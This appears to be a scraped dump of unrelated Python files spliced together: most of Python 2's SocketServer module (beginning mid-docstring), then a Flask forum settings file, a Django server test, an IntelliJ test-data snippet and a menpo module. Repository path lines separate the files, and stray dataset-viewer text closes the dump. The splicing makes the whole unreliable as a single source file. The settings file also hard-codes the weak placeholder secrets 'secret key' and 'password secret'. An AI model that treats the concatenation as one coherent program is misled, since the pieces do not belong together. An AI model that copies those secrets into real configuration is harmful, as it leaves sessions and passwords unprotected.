This module tries to capture the various aspects of defining a server:
For socket-based servers:
- address family:
- AF_INET{,6}: IP (Internet Protocol) sockets (default)
- AF_UNIX: Unix domain sockets
- others, e.g. AF_DECNET are conceivable (see <socket.h>
- socket type:
- SOCK_STREAM (reliable stream, e.g. TCP)
- SOCK_DGRAM (datagrams, e.g. UDP)
For request-based servers (including socket-based):
- client address verification before further looking at the request
(This is actually a hook for any processing that needs to look
at the request before anything else, e.g. logging)
- how to handle multiple requests:
- synchronous (one request is handled at a time)
- forking (each request is handled by a new process)
- threading (each request is handled by a new thread)
The classes in this module favor the server type that is simplest to
write: a synchronous TCP/IP server. This is bad class design, but
save some typing. (There's also the issue that a deep class hierarchy
slows down method lookups.)
There are five classes in an inheritance diagram, four of which represent
synchronous servers of four types:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
Note that UnixDatagramServer derives from UDPServer, not from
UnixStreamServer -- the only difference between an IP and a Unix
stream server is the address family, which is simply repeated in both
unix server classes.
Forking and threading versions of each type of server can be created
using the ForkingMixIn and ThreadingMixIn mix-in classes. For
instance, a threading UDP server class is created as follows:
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
The Mix-in class must come first, since it overrides a method defined
in UDPServer! Setting the various member variables also changes
the behavior of the underlying server mechanism.
To implement a service, you must derive a class from
BaseRequestHandler and redefine its handle() method. You can then run
various versions of the service by combining one of the server classes
with your request handler class.
The request handler class must be different for datagram or stream
services. This can be hidden by using the request handler
subclasses StreamRequestHandler or DatagramRequestHandler.
Of course, you still have to use your head!
For instance, it makes no sense to use a forking server if the service
contains state in memory that can be modified by requests (since the
modifications in the child process would never reach the initial state
kept in the parent process and passed to each child). In this case,
you can use a threading server, but you will probably have to use
locks to avoid two requests that come in nearly simultaneous to apply
conflicting changes to the server state.
On the other hand, if you are building e.g. an HTTP server, where all
data is stored externally (e.g. in the file system), a synchronous
class will essentially render the service "deaf" while one request is
being handled -- which may be for a very long time if a client is slow
to read all the data it has requested. Here a threading or forking
server is appropriate.
In some cases, it may be appropriate to process part of a request
synchronously, but to finish processing in a forked child depending on
the request data. This can be implemented by using a synchronous
server and doing an explicit fork in the request handler class
handle() method.
Another approach to handling multiple simultaneous requests in an
environment that supports neither threads nor fork (or where these are
too expensive or inappropriate for the service) is to maintain an
explicit table of partially finished requests and to use select() to
decide which request to work on next (or whether to handle a new
incoming request). This is particularly important for stream services
where each client can potentially be connected for a long time (if
threads or subprocesses cannot be used).
Future work:
- Standard classes for Sun RPC (which uses either UDP or TCP)
- Standard mix-in classes to implement various authentication
and encryption schemes
- Standard framework for select-based multiplexing
XXX Open problems:
- What to do with out-of-band data?
BaseServer:
- split generic "request" functionality out into BaseServer class.
Copyright (C) 2000 Luke Kenneth Casson Leighton <lkcl@samba.org>
example: read entries from a SQL database (requires overriding
get_request() to return a table entry from the database).
entry is processed by a RequestHandlerClass.
"""
# Author of the BaseServer patch: Luke Kenneth Casson Leighton
# XXX Warning!
# There is a test suite for this module, but it cannot be run by the
# standard regression test.
# To run it manually, run Lib/test/test_socketserver.py.
__version__ = "0.4"
import socket
import select
import sys
import os
import errno
try:
import threading
except ImportError:
import dummy_threading as threading
__all__ = ["TCPServer","UDPServer","ForkingUDPServer","ForkingTCPServer",
"ThreadingUDPServer","ThreadingTCPServer","BaseRequestHandler",
"StreamRequestHandler","DatagramRequestHandler",
"ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer","UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
def _eintr_retry(func, *args):
"""restart a system call interrupted by EINTR"""
while True:
try:
return func(*args)
except (OSError, select.error) as e:
if e.args[0] != errno.EINTR:
raise
class BaseServer:
"""Base class for server classes.
Methods for the caller:
- __init__(server_address, RequestHandlerClass)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you do not use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- server_close()
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- allow_reuse_address
Instance variables:
- RequestHandlerClass
- socket
"""
timeout = None
def __init__(self, server_address, RequestHandlerClass):
"""Constructor. May be extended, do not override."""
self.server_address = server_address
self.RequestHandlerClass = RequestHandlerClass
self.__is_shut_down = threading.Event()
self.__shutdown_request = False
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
pass
def serve_forever(self, poll_interval=0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__is_shut_down.clear()
try:
while not self.__shutdown_request:
# XXX: Consider using another file descriptor or
# connecting to the socket to wake this up instead of
# polling. Polling reduces our responsiveness to a
# shutdown request and wastes cpu at all other times.
r, w, e = _eintr_retry(select.select, [self], [], [],
poll_interval)
if self in r:
self._handle_request_noblock()
finally:
self.__shutdown_request = False
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will
deadlock.
"""
self.__shutdown_request = True
self.__is_shut_down.wait()
# The distinction between handling, getting, processing and
# finishing a request is fairly arbitrary. Remember:
#
# - handle_request() is the top-level call. It calls
# select, get_request(), verify_request() and process_request()
# - get_request() is different for stream or datagram sockets
# - process_request() is the place that may fork a new process
# or create a new thread to finish the request
# - finish_request() instantiates the request handler class;
# this constructor will handle the request all by itself
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = _eintr_retry(select.select, [self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def handle_timeout(self):
"""Called if no new request arrives within self.timeout.
Overridden by ForkingMixIn.
"""
pass
def verify_request(self, request, client_address):
"""Verify the request. May be overridden.
Return True if we should proceed with this request.
"""
return True
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.shutdown_request(request)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
pass
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
class TCPServer(BaseServer):
"""Base class for various socket-based server classes.
Defaults to synchronous IP stream (i.e., TCP).
Methods for the caller:
- __init__(server_address, RequestHandlerClass, bind_and_activate=True)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you don't use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- request_queue_size (only for stream sockets)
- allow_reuse_address
Instance variables:
- server_address
- RequestHandlerClass
- socket
"""
address_family = socket.AF_INET
socket_type = socket.SOCK_STREAM
request_queue_size = 5
allow_reuse_address = False
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
def server_bind(self):
"""Called by constructor to bind the socket.
May be overridden.
"""
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
self.socket.listen(self.request_queue_size)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
self.socket.close()
def fileno(self):
"""Return socket file number.
Interface required by select().
"""
return self.socket.fileno()
def get_request(self):
"""Get the request and client address from the socket.
May be overridden.
"""
return self.socket.accept()
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
try:
#explicitly shutdown. socket.close() merely releases
#the socket and waits for GC to perform the actual close.
request.shutdown(socket.SHUT_WR)
except socket.error:
pass #some platforms may raise ENOTCONN here
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
request.close()
class UDPServer(TCPServer):
"""UDP server class."""
allow_reuse_address = False
socket_type = socket.SOCK_DGRAM
max_packet_size = 8192
def get_request(self):
data, client_addr = self.socket.recvfrom(self.max_packet_size)
return (data, self.socket), client_addr
def server_activate(self):
# No need to call listen() for UDP.
pass
def shutdown_request(self, request):
# No need to shutdown anything.
self.close_request(request)
def close_request(self, request):
# No need to close anything.
pass
class ForkingMixIn:
"""Mix-in class to handle each request in a new process."""
timeout = 300
active_children = None
max_children = 40
def collect_children(self):
"""Internal routine to wait for children that have exited."""
if self.active_children is None:
return
# If we're above the max number of children, wait and reap them until
# we go back below threshold. Note that we use waitpid(-1) below to be
# able to collect children in size(<defunct children>) syscalls instead
# of size(<children>): the downside is that this might reap children
# which we didn't spawn, which is why we only resort to this when we're
# above max_children.
while len(self.active_children) >= self.max_children:
try:
pid, _ = os.waitpid(-1, 0)
self.active_children.discard(pid)
except OSError as e:
if e.errno == errno.ECHILD:
# we don't have any children, we're done
self.active_children.clear()
elif e.errno != errno.EINTR:
break
# Now reap all defunct children.
for pid in self.active_children.copy():
try:
pid, _ = os.waitpid(pid, os.WNOHANG)
# if the child hasn't exited yet, pid will be 0 and ignored by
# discard() below
self.active_children.discard(pid)
except OSError as e:
if e.errno == errno.ECHILD:
# someone else reaped it
self.active_children.discard(pid)
def handle_timeout(self):
"""Wait for zombies after self.timeout seconds of inactivity.
May be extended, do not override.
"""
self.collect_children()
def process_request(self, request, client_address):
"""Fork a new subprocess to process the request."""
self.collect_children()
pid = os.fork()
if pid:
# Parent process
if self.active_children is None:
self.active_children = set()
self.active_children.add(pid)
self.close_request(request) #close handle in parent process
return
else:
# Child process.
# This must never return, hence os._exit()!
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
os._exit(0)
except:
try:
self.handle_error(request, client_address)
self.shutdown_request(request)
finally:
os._exit(1)
class ThreadingMixIn:
"""Mix-in class to handle each request in a new thread."""
# Decides how threads will act upon termination of the
# main process
daemon_threads = False
def process_request_thread(self, request, client_address):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def process_request(self, request, client_address):
"""Start a new thread to process the request."""
t = threading.Thread(target = self.process_request_thread,
args = (request, client_address))
t.daemon = self.daemon_threads
t.start()
class ForkingUDPServer(ForkingMixIn, UDPServer): pass
class ForkingTCPServer(ForkingMixIn, TCPServer): pass
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass
if hasattr(socket, 'AF_UNIX'):
class UnixStreamServer(TCPServer):
address_family = socket.AF_UNIX
class UnixDatagramServer(UDPServer):
address_family = socket.AF_UNIX
class ThreadingUnixStreamServer(ThreadingMixIn, UnixStreamServer): pass
class ThreadingUnixDatagramServer(ThreadingMixIn, UnixDatagramServer): pass
class BaseRequestHandler:
"""Base class for request handler classes.
This class is instantiated for each request to be handled. The
constructor sets the instance variables request, client_address
and server, and then calls the handle() method. To implement a
specific service, all you need to do is to derive a class which
defines a handle() method.
The handle() method can find the request as self.request, the
client address as self.client_address, and the server (in case it
needs access to per-server information) as self.server. Since a
separate instance is created for each request, the handle() method
can define arbitrary other instance variariables.
"""
def __init__(self, request, client_address, server):
self.request = request
self.client_address = client_address
self.server = server
self.setup()
try:
self.handle()
finally:
self.finish()
def setup(self):
pass
def handle(self):
pass
def finish(self):
pass
# The following two classes make it possible to use the same service
# class for stream or datagram servers.
# Each class sets up these instance variables:
# - rfile: a file object from which receives the request is read
# - wfile: a file object to which the reply is written
# When the handle() method returns, wfile is flushed properly
class StreamRequestHandler(BaseRequestHandler):
"""Define self.rfile and self.wfile for stream sockets."""
# Default buffer sizes for rfile, wfile.
# We default rfile to buffered because otherwise it could be
# really slow for large data (a getc() call per byte); we make
# wfile unbuffered because (a) often after a write() we want to
# read and we need to flush the line; (b) big writes to unbuffered
# files are typically optimized by stdio even when big reads
# aren't.
rbufsize = -1
wbufsize = 0
# A timeout to apply to the request socket, if not None.
timeout = None
# Disable nagle algorithm for this socket, if True.
# Use only when wbufsize != 0, to avoid small packets.
disable_nagle_algorithm = False
def setup(self):
self.connection = self.request
if self.timeout is not None:
self.connection.settimeout(self.timeout)
if self.disable_nagle_algorithm:
self.connection.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY, True)
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
def finish(self):
if not self.wfile.closed:
try:
self.wfile.flush()
except socket.error:
# An final socket error may have occurred here, such as
# the local error ECONNABORTED.
pass
self.wfile.close()
self.rfile.close()
class DatagramRequestHandler(BaseRequestHandler):
# XXX Regrettably, I cannot get this working on Linux;
# s.recvfrom() doesn't return a meaningful client address.
"""Define self.rfile and self.wfile for datagram sockets."""
def setup(self):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
self.packet, self.socket = self.request
self.rfile = StringIO(self.packet)
self.wfile = StringIO()
def finish(self):
self.socket.sendto(self.wfile.getvalue(), self.client_address)
|
codesouls/ziwuquan
|
refs/heads/master
|
web/ziwu/settings.py
|
3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
DEBUG = False
TESTING = False
VERIFY_EMAIL = True
VERIFY_USER = True
ROOT_FOLDER = os.path.dirname(os.path.abspath(__file__))
if os.path.exists('public/static'):
STATIC_FOLDER = os.path.join(os.getcwd(), 'public', 'static')
else:
STATIC_FOLDER = os.path.join(ROOT_FOLDER, 'public', 'static')
#: site
SITE_TITLE = 'Ziwuquan'
SITE_URL = '/'
# SITE_URL = 'http://python-china.org/'
#: sidebar is a absolute path
# SITE_SIDEBAR = '/path/to/sidebar.html'
#: about page url
# SITE_ABOUT = '/node/about'
# SITE_ANALYTICS = 'UA-xxx-xxx'
#: session
SESSION_COOKIE_NAME = '_s'
# SESSION_COOKIE_SECURE = True
PERMANENT_SESSION_LIFETIME = 3600 * 24 * 30
#: account
SECRET_KEY = 'secret key'
PASSWORD_SECRET = 'password secret'
GRAVATAR_BASE_URL = 'http://www.gravatar.com/avatar/'
GRAVATAR_EXTRA = ''
#: sqlalchemy
SQLALCHEMY_DATABASE_URI = 'sqlite:///%s' % os.path.join(
os.getcwd(), 'db.sqlite'
)
# SQLALCHEMY_POOL_SIZE = 100
# SQLALCHEMY_POOL_TIMEOUT = 10
# SQLALCHEMY_POOL_RECYCLE = 3600
#: email settings
# MAIL_SERVER = 'smtp.gmail.com'
# MAIL_USE_SSL = True
# MAIL_USERNAME = ''
# MAIL_PASSWORD = ''
# MAIL_DEFAULT_SENDER = ('name', 'noreply@email.com')
#: cache settings
# find options on http://pythonhosted.org/Flask-Cache/
# CACHE_TYPE = 'simple'
#: i18n settings
# BABEL_DEFAULT_LOCALE = 'zh'
# BABEL_SUPPORTED_LOCALES = ['zh']
|
sanjeevtripurari/hue
|
refs/heads/master
|
desktop/core/ext-py/Django-1.6.10/tests/builtin_server/tests.py
|
57
|
from __future__ import unicode_literals
from io import BytesIO
from django.core.servers.basehttp import ServerHandler, MAX_SOCKET_CHUNK_SIZE
from django.utils.unittest import TestCase
class DummyHandler(object):
def log_request(self, *args, **kwargs):
pass
class FileWrapperHandler(ServerHandler):
def __init__(self, *args, **kwargs):
super(FileWrapperHandler, self).__init__(*args, **kwargs)
self.request_handler = DummyHandler()
self._used_sendfile = False
def sendfile(self):
self._used_sendfile = True
return True
def wsgi_app(environ, start_response):
start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
return [b'Hello World!']
def wsgi_app_file_wrapper(environ, start_response):
start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
return environ['wsgi.file_wrapper'](BytesIO(b'foo'))
class WSGIFileWrapperTests(TestCase):
"""
Test that the wsgi.file_wrapper works for the builting server.
Tests for #9659: wsgi.file_wrapper in the builtin server.
We need to mock a couple of handlers and keep track of what
gets called when using a couple kinds of WSGI apps.
"""
def test_file_wrapper_uses_sendfile(self):
env = {'SERVER_PROTOCOL': 'HTTP/1.0'}
handler = FileWrapperHandler(None, BytesIO(), BytesIO(), env)
handler.run(wsgi_app_file_wrapper)
self.assertTrue(handler._used_sendfile)
self.assertEqual(handler.stdout.getvalue(), b'')
self.assertEqual(handler.stderr.getvalue(), b'')
def test_file_wrapper_no_sendfile(self):
env = {'SERVER_PROTOCOL': 'HTTP/1.0'}
handler = FileWrapperHandler(None, BytesIO(), BytesIO(), env)
handler.run(wsgi_app)
self.assertFalse(handler._used_sendfile)
self.assertEqual(handler.stdout.getvalue().splitlines()[-1], b'Hello World!')
self.assertEqual(handler.stderr.getvalue(), b'')
class WriteChunkCounterHandler(ServerHandler):
"""
Server handler that counts the number of chunks written after headers were
sent. Used to make sure large response body chunking works properly.
"""
def __init__(self, *args, **kwargs):
super(WriteChunkCounterHandler, self).__init__(*args, **kwargs)
self.request_handler = DummyHandler()
self.headers_written = False
self.write_chunk_counter = 0
def send_headers(self):
super(WriteChunkCounterHandler, self).send_headers()
self.headers_written = True
def _write(self, data):
if self.headers_written:
self.write_chunk_counter += 1
self.stdout.write(data)
def send_big_data_app(environ, start_response):
start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
# Return a blob of data that is 1.5 times the maximum chunk size.
return [b'x' * (MAX_SOCKET_CHUNK_SIZE + MAX_SOCKET_CHUNK_SIZE // 2)]
class ServerHandlerChunksProperly(TestCase):
"""
Test that the ServerHandler chunks data properly.
Tests for #18972: The logic that performs the math to break data into
32MB (MAX_SOCKET_CHUNK_SIZE) chunks was flawed, BUT it didn't actually
cause any problems.
"""
def test_chunked_data(self):
env = {'SERVER_PROTOCOL': 'HTTP/1.0'}
handler = WriteChunkCounterHandler(None, BytesIO(), BytesIO(), env)
handler.run(send_big_data_app)
self.assertEqual(handler.write_chunk_counter, 2)
|
FHannes/intellij-community
|
refs/heads/master
|
python/testData/inspections/unusedImport/subpackageInInitPy/module_a.py
|
83
|
#! /usr/bin/env python
from package1 import ClassB
b = ClassB()
|
yuxiang-zhou/menpo
|
refs/heads/master
|
menpo/feature/predefined.py
|
4
|
from menpo.base import partial_doc
from .features import igo, hog
double_igo = partial_doc(igo, double_angles=True)
sparse_hog = partial_doc(hog, mode='sparse')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.